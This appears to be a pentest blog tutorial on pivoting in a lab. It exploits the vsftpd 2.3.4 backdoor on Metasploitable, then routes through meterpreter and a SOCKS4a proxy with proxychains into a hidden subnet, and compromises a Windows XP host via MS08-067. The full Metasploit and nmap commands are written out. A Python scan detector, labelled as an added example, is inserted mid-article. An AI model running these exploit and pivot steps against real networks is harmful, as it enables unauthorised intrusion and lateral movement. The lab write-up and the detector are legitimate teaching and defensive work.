Hello, cybersecurity enthusiasts and white hackers!

In this article I consider scenarios for attacking protected segments of a corporate network using pivoting techniques with the Metasploit Framework and proxychains.

scenario

Let's consider the following network topology:

For simplicity, I chose Metasploitable as machine A and a vulnerable Windows XP SP3 as machine B.

enum and compromise machine A

Often in a real pentest you do not know the exact addresses of the vulnerable machines in the network, so first I did host discovery:

nmap -sn -T4 10.10.2.0/24 -oG - | awk '/Up$/{print $2}'


As you can see, our target is 10.10.2.15.

Then scan:

nmap -Pn -sV 10.10.2.15

We found a vulnerable service on port 21. In this case we will pwn machine A via the Metasploit Framework. The Metasploit Framework from Rapid7 is one of the best-known frameworks in the area of vulnerability analysis, and it is used by many red teams and penetration testers worldwide.

Firstly, run:

msfconsole

In my case I am using Metasploit v5.0.87-dev on my Kali VM.

Exploitation:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.2.15
set RPORT 21
run


As you can see, we got a reverse shell session.

Enumerate network interfaces:

ifconfig

And we discovered another network interface with the address 10.9.1.22/24.

Upgrade our shell to Meterpreter:

use post/multi/manage/shell_to_meterpreter
set LPORT 4441
set LHOST 10.10.2.6
set SESSION 1
run


access hidden network via proxy

Further, according to the scenario, the attacker wants to gain access to the subnet behind the 10.9.1.0/24 interface. To do this, he needs to use the compromised host as a pivot.

Check our meterpreter session:

sessions -l


The following command can be used to create a tunnel through an existing meterpreter session:

sessions -i 2
run autoroute -s 10.9.1.0/24
run autoroute -p

We have added our additional route; it works only while the meterpreter session stays open.

In order for our tools such as nmap to work on this network, we must configure a SOCKS4a proxy:

use auxiliary/server/socks4a
set SRVHOST 10.10.2.6
set SRVPORT 8090
run

Check:

netstat -antp

As you can see, the proxy was created immediately, and you can also see our current meterpreter session on 10.10.2.6:4441.

Now we configure proxychains. With the proxychains utility, any TCP connection can be sent to its destination via a TOR, SOCKS4, SOCKS5 or HTTP/HTTPS proxy. Let's make a small update to the settings file /etc/proxychains.conf:

nvim /etc/proxychains.conf


Then, scan via proxychains and nmap:

proxychains4 nmap -sT -p21,22,135,139,445 10.9.1.0/24 2>&1 | grep 'OK'

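The sweep above is what a defender watching the 10.9.1.0/24 segment would see coming from machine A's inner interface. As an added example (not code from the original post), here is a small Python detector that flags a source reaching many distinct hosts on a few ports within a short window, run over constructed flow-log lines; the log line format is an assumption.

```python
"""Added example (not from the original post): a simple horizontal-scan
detector for the pivot scenario above, run over constructed flow-log lines.
Assumed log line format: "<ISO time> <src_ip> <dst_ip> <dst_port> <flags>".
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\S+)$")


def parse(log_text):
    """Yield (time, src, dst, dport) for each well-formed line; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m[1]), m[2], m[3], int(m[4])


def find_fanout(log_text, min_hosts=8, window=timedelta(seconds=60)):
    """Return {src: (distinct_hosts, sorted_ports)} for every source that
    reaches at least min_hosts distinct destinations inside one window.
    The sweep from the pivot host (machine A's 10.9.1.22 side) to many
    10.9.1.0/24 neighbours on a handful of ports is exactly this pattern."""
    per_src = defaultdict(list)
    for t, src, dst, port in parse(log_text):
        per_src[src].append((t, dst, port))
    alerts = {}
    for src, events in per_src.items():
        events.sort()
        for i, (t0, _, _) in enumerate(events):
            in_win = [e for e in events[i:] if e[0] - t0 <= window]
            hosts = {e[1] for e in in_win}
            if len(hosts) >= min_hosts and len(hosts) > alerts.get(src, (0,))[0]:
                alerts[src] = (len(hosts), sorted({e[2] for e in in_win}))
    return alerts


# Constructed sample: the pivot sweeps 10.9.1.1-12 on the five ports the post
# scans, while machine B (10.9.1.12) only makes a few DNS lookups.
SAMPLE_LOG = "\n".join(
    f"2024-01-01T10:00:{i:02d} 10.9.1.22 10.9.1.{i} {p} SYN"
    for i in range(1, 13) for p in (21, 22, 135, 139, 445)
) + "\n" + "\n".join(
    f"2024-01-01T10:01:{i:02d} 10.9.1.12 10.9.1.1 53 SYN" for i in range(5)
)

if __name__ == "__main__":
    for src, (n, ports) in find_fanout(SAMPLE_LOG).items():
        print(f"ALERT {src}: {n} hosts within 60s on ports {ports}")
```

Tune min_hosts and window to the segment's normal traffic; a dual-homed host that never spoke to its neighbours before is the strongest signal.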

exploit and access machine B

Scan machine B:

proxychains4 nmap -Pn -sT -sV 10.9.1.12

So, machine B's OS is Microsoft Windows XP.

Check port 445 for vulnerabilities:

proxychains4 nmap -Pn -sT -sV --script=*smb-vuln* 10.9.1.12

It is vulnerable to MS08-067.

Run in metasploit again:

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell/bind_tcp
set RHOSTS 10.9.1.12
set RHOST 10.9.1.12
set LPORT 4447
run

Here we used a bind shell, so it's not necessary to create a reverse route.

So, the machine B has been pwned :)

conclusion

The attacker discovered the hidden network by following the steps below:

  • the attacker got access to machine A (10.10.2.15), which was on the same network as the attacker, by exploiting vsftpd 2.3.4 on port 21
  • then he realised that machine A has two network interfaces
  • accessed the hidden network via autoroute in the meterpreter session to machine A
  • created a SOCKS4a proxy
  • then the attacker scanned ports on the newly discovered network 10.9.1.0/24
  • scanned ports on 10.9.1.12
  • machine B has a vulnerable SMB service on port 445
  • successfully exploited MS08-067 on machine B
  • done


This is a practical case for educational purposes only.

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine